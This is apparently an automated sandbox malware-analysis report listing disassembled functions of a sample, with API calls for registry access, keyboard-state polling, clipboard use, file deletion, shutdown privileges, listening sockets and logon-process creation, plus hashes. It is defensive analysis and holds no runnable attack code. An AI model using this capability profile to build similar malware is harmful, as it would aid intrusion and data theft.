                                                          • Instruction Fuzzy Hash: 7A616B7590021AEFDF128FA4DC84EEEBB79FF46700F448229E915E6291DB319A05CB60
                                                          Function 003C0465 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 003C0EA5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003BFE38,?,?), ref: 003C0EBC
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003C0537
                                                            • Part of subcall function 00349997: __itow.LIBCMT ref: 003499C2
                                                            • Part of subcall function 00349997: __swprintf.LIBCMT ref: 00349A0C
                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 003C05D6
                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 003C066E
                                                          • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 003C08AD
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 003C08BA
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 1240663315-0
                                                          • Opcode ID: ca7e9ea5eca43d6ec0f123613595fc0b8b33823afbcc759157fc802da7631767
                                                          • Instruction ID: 5cabba616a83789c6a5849bfaf5ce9a86870238255d00982eaa5e95f9cecbd0f
                                                          • Opcode Fuzzy Hash: ca7e9ea5eca43d6ec0f123613595fc0b8b33823afbcc759157fc802da7631767
                                                          • Instruction Fuzzy Hash: 07E12D31604210EFCB1ADF24C895E6ABBE9EF89714F04856DF899DB262DB30ED05CB51
                                                          Function 00354140 Relevance: 16.9, APIs: 1, Strings: 8, Instructions: 1132COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0D>$0D>$ERCP$Oa5$VUUU$VUUU$VUUU$VUUU
                                                          • API String ID: 0-1609675879
                                                          • Opcode ID: 4ab096eadf319b0f7b8fc69f2366826a207c9651ab78164291c466da012a4f73
                                                          • Instruction ID: 9013f548ad253ce0add71c95888ddd402b0a753f5b51a5a9513677e4b8db88bf
                                                          • Opcode Fuzzy Hash: 4ab096eadf319b0f7b8fc69f2366826a207c9651ab78164291c466da012a4f73
                                                          • Instruction Fuzzy Hash: 1FA2A270E0421ACBDF2ADF58C940BADB7B2BB44319F2581A9DC59A7690D7309EC9CF50
                                                          Function 003A003A Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetKeyboardState.USER32(?), ref: 003A0062
                                                          • GetAsyncKeyState.USER32(000000A0), ref: 003A00E3
                                                          • GetKeyState.USER32(000000A0), ref: 003A00FE
                                                          • GetAsyncKeyState.USER32(000000A1), ref: 003A0118
                                                          • GetKeyState.USER32(000000A1), ref: 003A012D
                                                          • GetAsyncKeyState.USER32(00000011), ref: 003A0145
                                                          • GetKeyState.USER32(00000011), ref: 003A0157
                                                          • GetAsyncKeyState.USER32(00000012), ref: 003A016F
                                                          • GetKeyState.USER32(00000012), ref: 003A0181
                                                          • GetAsyncKeyState.USER32(0000005B), ref: 003A0199
                                                          • GetKeyState.USER32(0000005B), ref: 003A01AB
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: State$Async$Keyboard
                                                          • String ID:
                                                          • API String ID: 541375521-0
                                                          • Opcode ID: 4ab9b4c5fdda795f2c2e05ac36f3feec72ba8e3578766fc6906b8ca94739222a
                                                          • Instruction ID: 00fad3b62212214259c1a43eefd3666157933706060dce5e3b42b00d161817e4
                                                          • Opcode Fuzzy Hash: 4ab9b4c5fdda795f2c2e05ac36f3feec72ba8e3578766fc6906b8ca94739222a
                                                          • Instruction Fuzzy Hash: DA41D9386047CA6DFF3B8B608C547F5BEA5EF13344F094099D6C6465C2EBA499C8C7A2
                                                          Function 003B427A Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                          • String ID:
                                                          • API String ID: 1737998785-0
                                                          • Opcode ID: c21e1e3ff16bf19057bc4ec5a246a15d5182bb1da8518b836785fd181657815d
                                                          • Instruction ID: 4505bc079e07d3e3c9692db560cc6cadd0f4f37c18663cb12a290f9395d82ca8
                                                          • Opcode Fuzzy Hash: c21e1e3ff16bf19057bc4ec5a246a15d5182bb1da8518b836785fd181657815d
                                                          • Instruction Fuzzy Hash: 35217C392006109FDB12AF64DC49F6E77A9EF48715F14802AF946DF6A2DB34AC108B58
                                                          Function 003A3833 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 003448AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003448A1,?,?,003437C0,?), ref: 003448CE
                                                            • Part of subcall function 003A4AD8: GetFileAttributesW.KERNEL32(?,003A374F), ref: 003A4AD9
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 003A38E7
                                                          • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 003A398F
                                                          • MoveFileW.KERNEL32(?,?), ref: 003A39A2
                                                          • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 003A39BF
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 003A39E1
                                                          • FindClose.KERNEL32(00000000,?,?,?,?), ref: 003A39FD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                          • String ID: \*.*
                                                          • API String ID: 4002782344-1173974218
                                                          • Opcode ID: a3c790e5d76a39766175b466d1ebc708a34883670da9b37783877db8f108da28
                                                          • Instruction ID: 258b34316ad785e90792c0952bfc49ec316d9986998b453a95dc3b8259a19dc8
                                                          • Opcode Fuzzy Hash: a3c790e5d76a39766175b466d1ebc708a34883670da9b37783877db8f108da28
                                                          • Instruction Fuzzy Hash: BE514D318051589ECB17EBA0DD929EEB7B9EF16300F644169F442BB192EF716F09CB60
                                                          Function 003AF47F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00347F41: _memmove.LIBCMT ref: 00347F82
                                                          • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 003AF4CC
                                                          • Sleep.KERNEL32(0000000A), ref: 003AF4FC
                                                          • _wcscmp.LIBCMT ref: 003AF510
                                                          • _wcscmp.LIBCMT ref: 003AF52B
                                                          • FindNextFileW.KERNEL32(?,?), ref: 003AF5C9
                                                          • FindClose.KERNEL32(00000000), ref: 003AF5DF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                          • String ID: *.*
                                                          • API String ID: 713712311-438819550
                                                          • Opcode ID: 67871bd2cb7bf4d39e2c8ff7e11eff4433a905b8e1c063b5002d4deb4cb368a4
                                                          • Instruction ID: eb741a939d606f737b1cb790b205080f1a15a41182cd533c3c51c2819fd7be58
                                                          • Opcode Fuzzy Hash: 67871bd2cb7bf4d39e2c8ff7e11eff4433a905b8e1c063b5002d4deb4cb368a4
                                                          • Instruction Fuzzy Hash: 29415175D0121AAFCF16DFA4CC45AEEBBB8FF06310F144566E815A71A1EB30AE44CB50
                                                          Function 003558C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID:
                                                          • API String ID: 4104443479-0
                                                          • Opcode ID: 0ee13a15e6e68e50db614941b6206b279dbadc7e8c30a7363ef406e3ccf64e72
                                                          • Instruction ID: 70a8d654e0fdc3e8484508f1475e0b36188e3fb70def9ac633f5852421dac542
                                                          • Opcode Fuzzy Hash: 0ee13a15e6e68e50db614941b6206b279dbadc7e8c30a7363ef406e3ccf64e72
                                                          • Instruction Fuzzy Hash: 0D12AF70A00609DFDF1ADFA5C991AEEB7F9FF48300F104529E806AB261EB35AD15CB50
                                                          Function 00355680 Relevance: 11.0, APIs: 5, Strings: 1, Instructions: 516COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00360F36: std::exception::exception.LIBCMT ref: 00360F6C
                                                            • Part of subcall function 00360F36: __CxxThrowException@8.LIBCMT ref: 00360F81
                                                          • _memmove.LIBCMT ref: 003905AE
                                                          • _memmove.LIBCMT ref: 003906C3
                                                          • _memmove.LIBCMT ref: 0039076A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                          • String ID: yZ5
                                                          • API String ID: 1300846289-2995190576
                                                          • Opcode ID: d6a527a734f2f1226c1b0461c116167dfc78fd0c95fabc5e9a8dbfc0419e65f2
                                                          • Instruction ID: edff42a4b2019b5db41139c6486ba847dc6e7a8153172f01d396e7baf5fb8232
                                                          • Opcode Fuzzy Hash: d6a527a734f2f1226c1b0461c116167dfc78fd0c95fabc5e9a8dbfc0419e65f2
                                                          • Instruction Fuzzy Hash: EC02C170A00209DFCF0ADF64D992AAE7BF9EF44310F158069E806EF255EB31E955CB90
                                                          Function 003A3B56 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 003448AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003448A1,?,?,003437C0,?), ref: 003448CE
                                                            • Part of subcall function 003A4AD8: GetFileAttributesW.KERNEL32(?,003A374F), ref: 003A4AD9
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 003A3BCD
                                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 003A3C1D
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 003A3C2E
                                                          • FindClose.KERNEL32(00000000), ref: 003A3C45
                                                          • FindClose.KERNEL32(00000000), ref: 003A3C4E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                          • String ID: \*.*
                                                          • API String ID: 2649000838-1173974218
                                                          • Opcode ID: ac37dc41c2cc613f811d98e95597a012a8acdb1870ec0b1d7ab9520f08b1b83f
                                                          • Instruction ID: 2facf064d776718d46a70c97ab69c84455a530f92d8c528a35fdf70df104a209
                                                          • Opcode Fuzzy Hash: ac37dc41c2cc613f811d98e95597a012a8acdb1870ec0b1d7ab9520f08b1b83f
                                                          • Instruction Fuzzy Hash: 11317E31009385AFC307EB64CC959AFB7ECAE96314F444E2DF4D19A191DB21EA09C762
                                                          Function 003A5264 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59shutdownCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00398AA3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00398AED
                                                            • Part of subcall function 00398AA3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00398B1A
                                                            • Part of subcall function 00398AA3: GetLastError.KERNEL32 ref: 00398B27
                                                          • ExitWindowsEx.USER32(?,00000000), ref: 003A52A0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                          • String ID: $@$SeShutdownPrivilege
                                                          • API String ID: 2234035333-194228
                                                          • Opcode ID: ef01738dbfb2f803222cd6fe20e821fc295d62b4b2eb106e808a4e406a057834
                                                          • Instruction ID: 97ce9c1e11d91cb1010c4121a0e1e33ef1f6e8ba4589c98a373e9007002f9c7c
                                                          • Opcode Fuzzy Hash: ef01738dbfb2f803222cd6fe20e821fc295d62b4b2eb106e808a4e406a057834
                                                          • Instruction Fuzzy Hash: 9801F272A906166EFB2B26689C4BFBA725CEB07741F250A25F907D24D2E9616C008690
                                                          Function 00353190 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 587COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: __itow__swprintf
                                                          • String ID: Oa5
                                                          • API String ID: 674341424-2933034282
                                                          • Opcode ID: 4cb02be848a69ccae08b944a1604024830a9cae7e4c6df6cc3657b7d7f93ca50
                                                          • Instruction ID: ed2c37e05bbc7765fa8d0d094a81d74a2a26158958fe07641beae6902bc1279d
                                                          • Opcode Fuzzy Hash: 4cb02be848a69ccae08b944a1604024830a9cae7e4c6df6cc3657b7d7f93ca50
                                                          • Instruction Fuzzy Hash: E6229D715083019FC726EF24C891F6FB7E5AF85344F11491DF8969B2A1EB71EA08CB92
                                                          Function 003B6399 Relevance: 9.1, APIs: 6, Instructions: 84networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 003B63F2
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 003B6401
                                                          • bind.WSOCK32(00000000,?,00000010), ref: 003B641D
                                                          • listen.WSOCK32(00000000,00000005), ref: 003B642C
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 003B6446
                                                          • closesocket.WSOCK32(00000000,00000000), ref: 003B645A
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$bindclosesocketlistensocket
                                                          • String ID:
                                                          • API String ID: 1279440585-0
                                                          • Opcode ID: bb4c258aa91b65ba2820d3ba4adb8c98d0c0dc78b02e2649dee5339a99a69547
                                                          • Instruction ID: 5cf526dc3c01ad79b92a92a85864404b1a2f5c461eae888152a1e8aa2eb91763
                                                          • Opcode Fuzzy Hash: bb4c258aa91b65ba2820d3ba4adb8c98d0c0dc78b02e2649dee5339a99a69547
                                                          • Instruction Fuzzy Hash: 5221BB352006009FCB02AF64C886BAEB7E9EF44724F118169E966AB392CB30BC008B51
                                                          Function 003988D9 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 0039890A
                                                          • OpenProcessToken.ADVAPI32(00000000), ref: 00398911
                                                          • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00398920
                                                          • CloseHandle.KERNEL32(00000004), ref: 0039892B
                                                          • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0039895A
                                                          • DestroyEnvironmentBlock.USERENV(00000000), ref: 0039896E
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                          • String ID:
                                                          • API String ID: 1413079979-0
                                                          • Opcode ID: daa14c661247b0ecb7483cb44c2cccf0d1a1e0ccd646cc3cd5fd3dc38793d764
                                                          • Instruction ID: e769e2b4c25115a86cd4f39f9a65e5addce91c439f4b171dc7ce8198f84798f0
                                                          • Opcode Fuzzy Hash: daa14c661247b0ecb7483cb44c2cccf0d1a1e0ccd646cc3cd5fd3dc38793d764
                                                          • Instruction Fuzzy Hash: 5C114772500209AFDF029FA8DD49FEA7BADFF49748F054065FA05A2160C7729D60AB61
                                                          Function 00341287 Relevance: 7.9, APIs: 5, Instructions: 379COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 00342612: GetWindowLongW.USER32(?,000000EB), ref: 00342623
                                                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 003419FA
                                                          • GetSysColor.USER32(0000000F), ref: 00341A4E
                                                          • SetBkColor.GDI32(?,00000000), ref: 00341A61
                                                            • Part of subcall function 00341290: DefDlgProcW.USER32(?,00000020,?), ref: 003412D8
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ColorProc$LongWindow
                                                          • String ID:
                                                          • API String ID: 3744519093-0
                                                          • Opcode ID: 045ed1e9d275a7acc5f546e213d931f6f553353e8e9091bec5a1be684f8d649a
                                                          • Instruction ID: 394ecbd6e03766a04cf07619ff45a7a17cccd4d0b74434f400f9f6c359e20292
                                                          • Opcode Fuzzy Hash: 045ed1e9d275a7acc5f546e213d931f6f553353e8e9091bec5a1be684f8d649a
                                                          • Instruction Fuzzy Hash: E6A17971112D44BEE63BAE288C48F7F79EDDB41381F164119F406DE581CB28BC8197B5
                                                          Function 003B685D Relevance: 7.6, APIs: 5, Instructions: 141networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 003B7EA0: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 003B7ECB
                                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 003B68B4
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 003B68DD
                                                          • bind.WSOCK32(00000000,?,00000010), ref: 003B6916
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 003B6923
                                                          • closesocket.WSOCK32(00000000,00000000), ref: 003B6937
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                          • String ID:
                                                          • API String ID: 99427753-0
                                                          • Opcode ID: 2513adaf8e57e4b32099643feec105a882712cc83ac0be6d7cd3dba45a0211e0
                                                          • Instruction ID: fa56aed8ad8514fd45495dafa950c18b22817a91f1741e15a6d1cba28f754f38
                                                          • Opcode Fuzzy Hash: 2513adaf8e57e4b32099643feec105a882712cc83ac0be6d7cd3dba45a0211e0
